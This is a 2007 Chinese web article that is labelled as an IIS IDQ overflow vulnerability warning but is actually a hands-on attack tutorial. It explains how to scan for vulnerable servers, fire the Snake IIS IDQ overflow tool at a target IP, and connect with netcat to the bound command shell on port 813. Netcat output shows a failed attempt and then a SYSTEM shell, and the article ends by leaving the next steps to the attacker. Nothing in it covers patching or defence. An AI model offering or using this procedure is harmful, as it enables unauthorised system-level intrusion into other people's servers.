漏洞警告之值得注意的IDQ溢出漏洞

时间:2007-07-15 03:40:44 来源:chinaitzhe.com 作者:ChinaITzhe 编辑:gaopoadmin

要用到3个程序，一个Snake IIS IDQ 溢出程序GUI版本，一个扫描器，还有NC。

首先扫描一台有IDQ漏洞的机器，然后设置Snake IIS IDQ 溢出程序，在被攻击IP地址后面写上对方的IP。端口号一般不需要改动，软件的默认绑定CMD.EXE的端口是813，不改了。用默认的，左面选择操作系统类型，随便选一个，我们选IIS5 English Win2k Sp0吧，点击IDQ溢出，出现发送Shellcode成功的提示了，然后我们用NC来连接。

进入MS-DOS。进入“nc”的目录。然后：nc --v IP 813

c:/>nc -vv IP 813            IP: inverse host lookup failed: h_errno 11004: NO_DATA            (UNKNOWN) [IP] 813 (?): connection refused            sent 0, rcvd 0: NOTSOCK            c:/>

看来没成功，别灰心，再来一次，换用IIS5 English Win2k Sp1试试。

c:/>nc -vv IP 813            IP: inverse host lookup failed: h_errno 11004: NO_DATA            (UNKNOWN) [IP] 813 (?) open            Microsoft Windows 2000 [Version 5.00.2195]            (C) Copyright 1985-2000 Microsoft Corp.            C:/WINNT/system32>

哈哈，终于上来啦，你现在可是system权限，下面该怎么做就看你的啦。

关键字：漏洞警告之值得注意的IDQ溢出漏洞

网友评论加入收藏错误报告论坛讨论关闭此页

上一篇：漏洞警告之非常危险的IDA溢出漏洞

下一篇：骇客学堂：带注释手动注入脚本命令整理

无相关信息

文章评论

共有 0 位网友发表了评论此处只显示部分留言点击查看完整评论页面

中国IT者

漏洞警告之值得注意的IDQ溢出漏洞

相关文章

文章评论

最新信息

点击排行榜

最新代码下载